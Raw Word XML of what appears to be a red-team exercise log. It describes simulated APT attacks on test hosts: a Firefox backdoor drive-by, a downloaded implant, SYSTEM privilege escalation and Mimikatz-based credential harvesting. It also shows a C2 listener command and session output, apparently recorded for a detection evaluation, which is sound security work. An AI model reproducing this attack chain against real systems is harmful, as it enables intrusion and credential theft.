      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Error: ctfhost3.exe did not ru</w:t>
      </w:r>
      <w:r w:rsidR="00ED047C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>n and cannot be found in %TEMP%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB9BB74" w14:textId="77777777" w:rsidR="00ED047C" w:rsidRDefault="00ED047C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC5F637" w14:textId="7BD6A67B" w:rsidR="00720419" w:rsidRPr="00FC027E" w:rsidRDefault="00CE2C66" w:rsidP="00ED047C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc12600016"/>
      <w:r w:rsidRPr="00FC027E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">05/09/2019 – </w:t>
      </w:r>
      <w:r w:rsidR="00526748">
        <w:t>TA5.2 Attacks Day 2 and Windows Drakon APT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC51502" w14:textId="436CC18B" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc12600017"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Schedule</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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475"/>
        <w:gridCol w:w="5865"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A351B2" w:rsidRPr="00FC027E" w14:paraId="7B361ABD" w14:textId="77777777" w:rsidTr="006C3099">
        <w:trPr>
          <w:trHeight w:val="294"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="15C3A494"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13:26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0D8D73BF"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TA1 FiveDirections 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="069E1FC9"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Firefox Drakon APT Elevate Copykatz Sysinfo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A351B2" w:rsidRPr="00FC027E" w14:paraId="217CD837" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="65ACB1C1"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13:57</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2D2C24F0"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TA1 MARPLE 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1191CD47"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Firefox Drakon APT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A351B2" w:rsidRPr="00FC027E" w14:paraId="10BF4726" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4D7F6B07"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14:35</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2C39DC76"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TA5.2 Ubuntu 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="42CB6A71"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Firefox Drakon APT Elevate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A351B2" w:rsidRPr="00FC027E" w14:paraId="26B81E64" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="151924F8"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15:34</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00ABFF5C"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TA5.2 Windows 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="617027EA"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Firefox BITS Micro APT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0072B43B" w14:textId="3E87F24A" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cstheme="majorHAnsi"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_1b1gdhhi3tlz" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="49" w:name="_Toc12600018"/>
      <w:bookmarkEnd w:id="48"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="47015EED" w14:textId="7509E619" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[eth0:1100] 77.138.117.150:80 -&gt; 128.55.12.167:8100</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009B5E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>5d3: www.usdoj.gov</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA385BD" w14:textId="6F4CEC15" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[eth0:1101] 150.159.104.124:80 -&gt; 128.55.12.167:8101</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009B5E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>5d3: sc server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4E5CC2" w14:textId="6869D427" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[eth0:1102] 19.49.27.211:80 -&gt; 128.55.12.167:8102</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5d3: 110oc2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640D5B00" w14:textId="3038E28F" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc12600019"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>13:26 -- TA1 FiveDirections 2 -- Firefox Drakon APT Elevate Copykatz Sysinfo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="156049C1" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Partial success, WMI failed due to some configuration issue on target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FA3C1E" w14:textId="2A56E823" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The first of the attacks were against the Five Directions 1 host.  The attack used the Drakon APT simulacrum utilizing the built-in Firefox backdoor to establish a connection via web browser.  The connection was made when the host surfed to </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00FC027E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          </w:rPr>
          <w:t>http://www.usdoj.gov</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> which had been hijacked by TA5.1.  The shellcode connects out and downloads the Drakon APT at which time it is loaded into memory.  Drakon APT then connects back to the C2 and the elevate driver escalates privileges to SYSTEM.  Copykatz is a new capability not previously utilized by TA5.1 against the performers.  It is a module that uses Mimikatz to harvest credentials from Windows hosts.  During the attack. Simple commants such as whoami, hostname, getpid and reading the cashed credentials were performed.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157DDE3B" w14:textId="58F10C86" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc12600020"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="18C33868" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-fivedirections-2</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.56</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Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14579F63" w14:textId="0217ABAE" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_f7h5cx2fn4r5" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="53" w:name="_Toc12600021"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="008A55E3"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Firefox 54.0.1 backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560D8C6D"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Drakon APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D11CD2"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Elevate driver (Perfmon)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514B86D2"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Copykatz module (Mimikatz)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597FFAA8"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Sysinfo module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355EBD67" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc12600022"/>
      <w:r>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="0E94E167" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0097DCC0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Benign activity browsed to www.usdoj.gov</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFC6B4B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Connection to :8100 (webserver)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAD0944" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Connection to :8101 (sc server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B496605" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Connection to ?? (not on 8102 on oc2) [most likely 128.55.12.233:443]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DBB260" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C56B736" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:43</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BF5E25" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Benign activity browsed to www.usdoj.gov</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098B8EE1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49F5149F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:/e5/projects/drakon-apt/oc2$ sudo python ocMain.py --http 8102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A24EB28" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[sudo] password for kududyn: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555E3DBD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Must install flask to use snuggly, ignoring...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B735E32" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>projects/build_drakon.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F1522C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Default interface: 0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEA29B1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Listening for connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714E3E9E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            0.0.0.0:8102  [HTTP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C53300" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65426DBA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40785389" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="632975E0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## New connection received ##################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489BFAAD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] [windows] [x64] [N/A] [N/A]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EC92B2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Initializing new windows console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C473F4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## NEW CONSOLE READY [W1] ####################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A147CF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D4CA6D0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:44</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A878DE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A31A780" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] admin</w:t>
      </w:r>
    </w:p>
